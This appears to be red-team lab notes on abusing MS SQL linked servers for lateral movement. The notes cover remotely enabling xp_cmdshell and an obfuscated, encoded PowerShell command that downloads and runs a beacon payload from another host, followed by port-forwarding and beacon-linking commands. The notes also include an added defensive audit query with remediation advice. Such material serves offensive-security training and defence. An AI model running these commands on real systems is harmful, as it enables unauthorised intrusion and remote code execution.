MS SQL Lateral Movement
SQL Server has a concept called "links" (linked servers), which allows a database instance to access data from an external source. MS SQL supports multiple sources, including other MS SQL Servers. These can be practically anywhere, including other domains, forests or the cloud.
We can discover any links that the current instance has:
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
This shows a link to sql-1.cyberbotic.io, which we can query using OpenQuery:
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
The use of double and single quotes is important when using OpenQuery: double quotes enclose the linked server name, single quotes enclose the pass-through query, and any single quote inside that query has to be doubled.
We can also check the xp_cmdshell status on the remote server.
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
If xp_cmdshell is disabled, you won't be able to enable it by executing sp_configure via OpenQuery. If RPC Out is enabled on the link (which is not the default configuration), then you can enable it with EXEC ... AT using the following syntax:
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
The square brackets around the linked server name are required.
Manually querying databases to find links can be cumbersome and time-consuming, so you can also use Get-SQLServerLinkCrawl (from PowerUpSQL) to automatically crawl all available links.
beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
Version : SQL Server 2019
Instance : SQL-2
CustomQuery :
Sysadmin : 1
Path : {SQL-2}
User : DEV\bfarmer
Links : {SQL-1.CYBERBOTIC.IO}
Version : SQL Server 2019
Instance : SQL-1
CustomQuery :
Sysadmin : 1
Path : {SQL-2, SQL-1.CYBERBOTIC.IO}
User : sa
Links :
This output shows that the link from SQL-2 to SQL-1 is configured with a local 'sa' account, and that it has sysadmin privileges on the remote server.
To execute a Beacon on SQL-1, we can largely repeat the same steps as before. However, note that SQL-1 may only be able to talk to SQL-2 and not to WKSTN-2 or any other machine in the DEV domain.
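The link crawl above is the attacker's view of the topology. The same information is available to a DBA or auditor straight from the catalog views, which is where the 'sa' mapping on the SQL-2 to SQL-1 link should have been caught. The following query is an added example, not part of the original notes or of PowerUpSQL; it assumes only the standard sys.servers, sys.linked_logins and sys.server_principals views and a login with VIEW ANY DEFINITION (or sysadmin) on the instance being reviewed.

```sql
-- Added audit query (not from the original notes): enumerate every linked server
-- on this instance, whether RPC Out and data access are enabled, and which remote
-- credential each local login is mapped to. The risky combination shown in the
-- notes is a link that maps callers to a fixed privileged remote login (e.g. 'sa'):
-- anyone who can run a query here inherits that account on the remote server.
SELECT
    s.name                                           AS link_name,
    s.data_source,
    s.provider,
    s.is_rpc_out_enabled,                            -- 1 = EXEC(...) AT [link] works
    s.is_data_access_enabled,                        -- 1 = OPENQUERY works
    -- local_principal_id 0 is the catch-all mapping that applies to every login
    CASE WHEN ll.local_principal_id = 0
         THEN N'<all local logins>'
         ELSE lp.name END                            AS local_login,
    ll.uses_self_credential,                         -- 1 = impersonate the caller
    ll.remote_name,                                  -- fixed remote login, if any
    CASE
        WHEN ll.remote_name = N'sa'
            THEN N'HIGH: fixed mapping to remote sa'
        WHEN ll.remote_name IS NOT NULL AND ll.uses_self_credential = 0
            THEN N'MEDIUM: fixed remote credential, review its privileges'
        WHEN s.is_rpc_out_enabled = 1
            THEN N'LOW: RPC Out enabled, remote sp_configure possible'
        ELSE N'INFO'
    END                                              AS risk
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
       ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1            -- server_id 0 is the local instance itself
ORDER BY risk, s.name, local_login;
```

Run it on every instance in scope, not just the one first reached: links are one-directional, so the path SQL-2 to SQL-1 is only visible from SQL-2. Remediation for a HIGH row is to replace the fixed mapping with a least-privilege remote login (or self-mapping with Kerberos delegation where the design allows), and to leave RPC Out disabled unless a stored procedure genuinely has to be executed remotely.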
beacon> run hostname
sql-2
beacon> getuid
[*] You are DEV\mssql_svc (admin)
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
beacon> rportfwd 8080 127.0.0.1 80
[+] started reverse port forward on 8080 to 127.0.0.1:80
Because of all the additional quotes needed for OpenQuery, it's easier to use an encoded command.
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''')
The inclusion of a benign statement at the beginning of the query is required for xp_cmdshell to trigger.
beacon> link sql-1.cyberbotic.io TSVCPIPE-ae2b7dc0-4ebe-4975-b8a0-06e990a41337
[+] established link to child beacon: 10.10.120.25